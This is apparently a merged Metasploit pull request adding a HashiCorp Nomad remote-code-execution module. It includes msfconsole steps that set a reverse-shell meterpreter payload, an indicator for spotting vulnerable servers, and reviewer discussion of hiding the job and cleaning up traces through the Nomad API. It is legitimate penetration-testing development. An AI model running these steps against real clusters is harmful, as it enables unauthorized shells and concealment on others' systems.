### PR TITLE
HashiCorp Nomad RCE

### PR DESCRIPTION
**Pull request by wdahlenburg**
HashiCorp's Nomad product allows for clusters to be spun up that can run jobs in containers or directly on clients. This module allows for the use of the 'raw_exec' and 'exec' drivers to create a job that spawns a shell. It closely mirrors the [Consul service module](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/consul_service_exec.rb). 

The job scheduling is intended functionality, so this module just abuses insecure defaults. If a Nomad server was configured to require ACL tokens, which are Nomad's authentication, this module supports them through the X-Nomad-Token header. 

## Verification

List the steps needed to make sure this thing works

- [ ] Start Nomad server on target host (See documentation for installation and execution instructions)
- [ ] Start `msfconsole`
- [ ] `use exploit/multi/misc/nomad_exec`
- [ ] `set RHOST 127.0.0.1`
- [ ] `set RPORT 4646`
- [ ] `check`
- [ ] **Verify** that the host is vulnerable. If not, provide the appropriate ACL token and repeat the check.
- [ ] `set payload linux/x86/meterpreter/reverse_tcp`
- [ ] `set LHOST eth0`
- [ ] `run`
- [ ] **Verify** that a new job is created (http://127.0.0.1:4646/ui/jobs)
- [ ] **Verify** that a new session is created in Metasploit

#### Optional setup 

Setting up a prod server with TLS or the ACL tokens:
* Follow https://learn.hashicorp.com/tutorials/nomad/production-deployment-guide-vm-with-consul
* Implement TLS: https://learn.hashicorp.com/tutorials/nomad/security-enable-tls
* Require ACL tokens: https://learn.hashicorp.com/tutorials/nomad/access-control-bootstrap

---

The best indicator of exploitability was the /v1/agent/self endpoint. Either driver.raw_exec.enable would exist and be set to "1" or "true" or a plugin would be enabled with the name of 'raw_exec'. The 'exec' driver seemed to have looser constraints.

### CODE REVIEW

**Comment by adfoster-r7** [comment]
@msjenkins-r7 test this please

File: modules/exploits/multi/misc/nomad_exec.rb [hunk 1]
```diff
@@ -0,0 +1,195 @@
...
+            }
+          ]
+        }
+      }.to_json
+    })
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, 'An error occured when contacting the Nomad API.')
+    end
+
+    job_info = JSON.parse(res.body)
```
Comment (adfoster-r7) [inline modules/exploits/multi/misc/nomad_exec.rb:184]: Similar to the check method, would this need to handle `JSON::ParserError` being raised?

File: modules/exploits/multi/misc/nomad_exec.rb [hunk 2]
```diff
@@ -0,0 +1,195 @@
...
+    eval_id = job_info['EvalID']
+
+    print_status("Job '#{job_name}' successfully created as '#{eval_id}'.")
+    print_status("Waiting for job '#{job_name}' to trigger")
+    sleep(12)
```
Comment (adfoster-r7) [inline modules/exploits/multi/misc/nomad_exec.rb:189]: Just a sanity question, is there a significance to the 12 second wait? Or is this just an arbitrary value for now? 👀

Comment (wdahlenburg) [reply modules/exploits/multi/misc/nomad_exec.rb:189]: The wait was taken from https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/consul_service_exec.rb#L139

I suppose WfsDelay could be adjusted instead. Would this work?

**Comment by adfoster-r7** [comment]
Verified this works as expected 🎉 

One small thing I noticed was the UI show the job running the reverse shell code for the duration of meterpreter being open:

image

image



Until the shell dies:

image

I wonder if there's a way to be more discrete? Not a blocker to getting this landed, just curious :+1:

**Comment by wdahlenburg** [comment]
Active or dead job details still show up in the UI or API. I'm not sure if Metasploit provides a consistent way to background payloads on Linux/Windows hosts, but manually backgrounding the payload seems to move the job status to DEAD while the shell remains alive.

It's possible to clean up dead jobs by sending a PUT request to /v1/system/gc. For pending jobs (an example is raw_exec without a client that supports that driver), you can send a DELETE request to /v1/job/:job_id to move pending jobs to the DEAD state. Is there a good way to call this in a function either once the session has been closed or was unsuccessful?

**Comment by jmartin-r7** [comment]
Existing event handlers for on_session_close() and on_modules_error() could provide options for performing the `DELETE` request. Will see if I can find/create an example for this.

**Comment by wdahlenburg** [comment]
> Existing event handlers for on_session_close() and on_modules_error() could provide options for performing the `DELETE` request. Will see if I can find/create an example for this.

I was able to see a few examples of plugins ([here](https://github.com/rapid7/metasploit-framework/blob/master/plugins/libnotify.rb) and [here](https://github.com/rapid7/metasploit-framework/blob/master/plugins/sounds.rb))  using Msf::SessionEvent to perform on_session_* actions. It didn't seem to work within my exploit module when I included that module and added the on_session_close method. @jmartin-r7 were you able to find an example?

**Comment by adfoster-r7** [comment]
Sorry for the delay. I'm happy to land this pull request without the cleanup steps, if you updated the module's metadata to include that in the notes section and I can get this landed! 🎉 

https://github.com/rapid7/metasploit-framework/wiki/Definition-of-Module-Reliability,-Side-Effects,-and-Stability

**Comment by wdahlenburg** [comment]
> Sorry for the delay. I'm happy to land this pull request without the cleanup steps, if you updated the module's metadata to include that in the notes section and I can get this landed! tada
> 
> https://github.com/rapid7/metasploit-framework/wiki/Definition-of-Module-Reliability,-Side-Effects,-and-Stability

I added the Notes section in 1789c7b. Let me know if there is a difference in opinion there or if I need to add any more module info.

**Comment by adfoster-r7** [comment]
## Release Notes

Adds a new multi/misc/nomad_exec module for HashiCorp's Nomad product. This module supports the use of the 'raw_exec' and 'exec' drivers to create a job that spawns a shell. It closely mirrors the Consul service module.

**Comment by adfoster-r7** [comment]
Thanks @wdahlenburg! :+1:

**Pull request merged**